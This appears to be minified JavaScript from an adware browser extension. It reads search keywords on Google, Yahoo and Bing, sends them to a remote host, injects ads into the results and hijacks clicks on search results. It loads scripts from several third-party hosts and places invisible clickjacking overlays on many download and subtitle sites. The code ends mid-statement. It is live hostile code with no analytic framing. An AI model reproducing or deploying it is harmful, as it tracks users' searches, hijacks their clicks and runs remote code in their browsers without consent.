return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\$([0-9]+)\$/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():

a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}]; for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"== a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom= function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a; c=c.replace(/\\

[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\", function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b= a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick(); b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c, function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100, \"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=1301266267699183854&eid=892&pid=1&prid=316\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"

//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=892_1&hid=1301266267699183854&bname=ROoYalShopperAppp\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=892_1&hid=1301266267699183854&bname=ROoYalShopperAppp\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=564350&ext=ROoYalShopperAppp&systemid=1301266267699183854&ext=ROoYalShopperAppp\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=gpp&name=ROoYalShopperAppp\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var g=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+f.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},f=document.createElement(\"script\");\nf.type=\"text/javascript\";f[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+g.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(f)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(g=document.createElement(\"img\"),g.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),g.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",f=document.getElementById(\"r1113566095\").parentNode,\nf.style.position=\"relative\",f.appendChild(g))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-

1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&newfunction(){for(var g=[\"adv.php?\",\"/adv.php?\"],f=0;f<document.links.length;f++)for(var h=document.links[f],k=h.pathname+h.search,m=0;m<g.length;m++)g[m]==k.substr(0,g[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1),a.addEventListener(\"mousedown\",function(g){g.returnValue=!1;g.preventDefault&&g.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2,b);b.parentNode.removeChild(b)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var g=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var f=setInterval(function(){try{var h=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*h.children[2].children[1].children[1].innerText);m.push(1*h.children[2].childre

n[2].children[1].innerText);m.push(1*h.children[3].children[1].children[1].innerText);m.push(1*h.children[3].children[2].children[1].innerText);for(var n=h=0;n<m.length;n++)h+=m[n];if(!(0<h)){clearInterval(f);var l=document.createElement(\"div\");l.style.position=\n\"absolute\";l.style.top=0;l.style.left=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";var q=document.getElementById(\"ucd-countdown-1-content\").children[1];q.style.position=\"relative\";q.appendChild(l)}}catch(u){try{var r=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){r+=1*jQuery(this).text()});if(0===r){clearInterval(f);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof g&&30<++g&&clearInterval(f)}}},750)}catch(h){}})();\nvar __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var g=0;g<document.links.length;g++)try{var f=document.links[g].href.toLowerCase();if(-1==f.indexOf(\"ww.ziddu.co\")&&-1==f.indexOf(\"#\")&&-1==f.indexOf(\"tunes.apple.co\")&&-1==f.indexOf(\"lay.google.co\")&&-1==f.indexOf(\"/gallery/\")){try{for(var h=document.links[g],k=0;15>=k;k++)h=h.parentNode;if(-1<h.className.indexOf(\"footerbg\"))continue}catch(m){}var n=document.links[g].parentNode;\nif(!(-1<n.className.indexOf(\"addthis_toolbox\"))){n.style.position=\"relative\";var l=document.createElement(\"div\");l.style.position=\"absolute\";l.style.left=0;l.style.top=0;l.style.width=\"100%\";l.style.height=\"100%\";l.style.zIndex=\"9999\";l.style.cursor=\"pointer\";n.appendChild(l)}}}catch(q){}f=document.getElementsByTagName(\"iframe\");for(g=0;g<f.length;g++)try{-1==f[g].src.indexOf(\"acebook.co\")&&-1==f[g].src.indexOf(\"cp.crwdcntrl.ne\")&&(n=f[g].parentNode,n.style.position=\"relative\",l=document.createElement(\"div\"),\nl.style.position=\"absolute\",l.style.left=0,l.style.top=0,l.style.width=\"100%\",l.style.height=\"100%\",l.style.zIndex=\"9999\",l.style.cursor=\"pointer\",l.id=g,n.appendChild(l))}catch(u){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);\nnew function(){if(0<location.host.toLowerCase().indexOf(\"pensubtitles.or\")){f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";var g=document.getElementsByTagName(\"iframe\")[0].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[0]);g.style.position=\"relative\";f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"728px\";f.style.height=\"90px\";f.style.cursor=\n\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g=document.getElementsByTagName(\"iframe\")[1].parentNode;g.insertBefore(f,document.getElementsByTagName(\"iframe\")[1]);g.style.position=\"relative\";g=document.links;for(i=0;i<g.length;i++)\"Download\"==(\"undefined\"===typeof g[i].innerText?g[i].textContent:g[i].innerText)&&(f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.width=\"214px\",f.style.height=\"40px\",f.style.cursor=\"pointer\",f.style.top=\"0\",f.style.zIndex=\"2000\",p=g[i].parentNode,\np.style.position=\"relative\",p.insertBefore(f,g[i]));document.getElementById(\"scrubbuad\").style.zIndex=\"15\";f=document.createElement(\"div\");f.style.zIndex=\"15000\";f.style.right=\"9px\";f.style.bottom=\"0\";f.style.position=\"fixed\";f.style.padding=\"0\";f.style.margin=\"0 0 30px 0\";f.style.width=\"220px\";f.style.height=\"72px\";f.style.overflow=\"visible\";f.style.cursor=\"pointer\";document.getElementsByTagName(\"body\")[0].firstChild.appendChild(f)}if(-1<window.location.href.indexOf(\"pensubtitles.us/opensubtitles-playe\")){g=\ndocument.getElementById(\"divPlayerDesc\");if(null!=g){g.style.position=\"relative\";var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.zIndex=\"2000\";g.appendChild(f)}g=document.getElementById(\"divPlayerHead\");if(null!=g)for(var h=0;h<g.children.length;h+

+)if(\"span\"==g.children[h].tagName.toLowerCase()){var k=g.children[h],f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";\nf.style.height=\"70px\";f.style.cursor=\"pointer\";f.style.top=\"-50px\";f.style.zIndex=\"2000\";k.style.position=\"relative\";k.appendChild(f)}}};\nif(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var p={},frames=document.getElementById(\"confirmbox\").getElementsByTagName(\"iframe\"),index=0;index<frames.length;index++)\"300\"==frames[index].getAttribute(\"width\")&&\"250\"==frames[index].getAttribute(\"height\")&&(p=frames[index].parentNode);p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";p.appendChild(d)}\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var f=$(\".download\").parent();f.css(\"position\",\"relative\");var g=document.createElement(\"div\");g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"100%\";g.style.width=\"122px\";g.style.right=\"0\";g.style.top=\"0\";g.style.cursor=\"pointer\";f.append(g);f=$(\"#addBoxX\").parent();f.css(\"position\",\"relative\");g=document.createElement(\"div\");\ng.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"45px\";g.style.width=\"101px\";g.style.right=\"22px\";g.style.bottom=\"16px\";g.style.cursor=\"pointer\";f.append(g);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var g=document.links,f={},h={},k=0;k<g.length;k++)f=g[k].getAttribute(\"href\"),null!=f&&-1<f.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(f=g[k].getAttribute(\"id\"),null!=f&&\"addBoxX\"==f?(h=g[k].parentNode,h.style.position=\"relative\",\nf=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"45px\",f.style.width=\"101px\",f.style.right=\"22px\",f.style.bottom=\"16px\"):(h=g[k].parentNode,h.style.position=\"relative\",f=document.createElement(\"div\"),f.style.position=\"absolute\",f.style.zIndex=\"2000\",f.style.height=\"100%\",f.style.width=\"122px\",f.style.right=\"0\",f.style.top=\"0\"),f.style.cursor=\"pointer\",h.appendChild(f))};\nnew function(){if(-1<location.host.toLowerCase().indexOf(\"eehd.co\")){var g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";var f=document.getElementsByTagName(\"iframe\")[0].parentNode;f.style.position=\"relative\";f.appendChild(g);g=document.createElement(\"div\");g.style.top=\"0\";g.style.width=\"100%\";g.style.height=\"100%\";g.style.cursor=\"pointer\";g.style.zIndex=\"2000\";g.style.position=\"absolute\";\nf=document.getElementById(\"preview\");f.style.position=\"relative\";f.appendChild(g)}};new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.ne\")&&(window.__intCount=0,window.__int=setInterval(function(){var g=document.getElementById(\"download-manager-checkbox\");if(null!==g)try{g.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(f){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName&&null!==document.getElementById(\"download-manager-checkbox\"))for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var g=document.getElementsByClassName(\"nasjfkla\"),f=0;f<g.length;f++)g[f].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=\nlink.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");b.classNa

me=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild(b)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var g=document.getElementById(\"leftside\"),f=0;f<g.children.length;f++)if(/\\bspnBook\\b/.test(g.children[f].className))for(var h=g.children[f].getElementsByTagName(\"a\"),k=0;k<h.length;k++)h[k].setAttribute(\"href\",\"#\"),h[k].setAttribute(\"target\",\"\")},1E3);\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var g=document.getElementsByTagName(\"center\"),f=0;f<g.length;f++){var h=g[f].firstChild;\"undefined\"!==typeof h.tagName&&\"a\"==h.tagName.toLowerCase()&&(g[f].style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.top=\"0\",h.style.left=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.zIndex=\"2000\",h.style.cursor=\"pointer\",g[f].appendChild(h))}};\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"llplayer.com.b\"))for(var g=document.getElementsByTagName(\"img\"),f=0;f<g.length;f++)if(g[f].getAttribute(\"src\")&&-1<g[f].getAttribute(\"src\").indexOf(\"baixatudo.png\")){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.position=\"absolute\";h.style.zIndex=\"9999\";h.style.top=\"0\";h.style.cursor=\"pointer\";var k=g[f].parentNode.parentNode;k.style.position=\"relative\";k.appendChild(h)}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"ubtitulosespanol.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Descargar Subt\\u00edtulo\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";varh=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Download Subtitle\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var 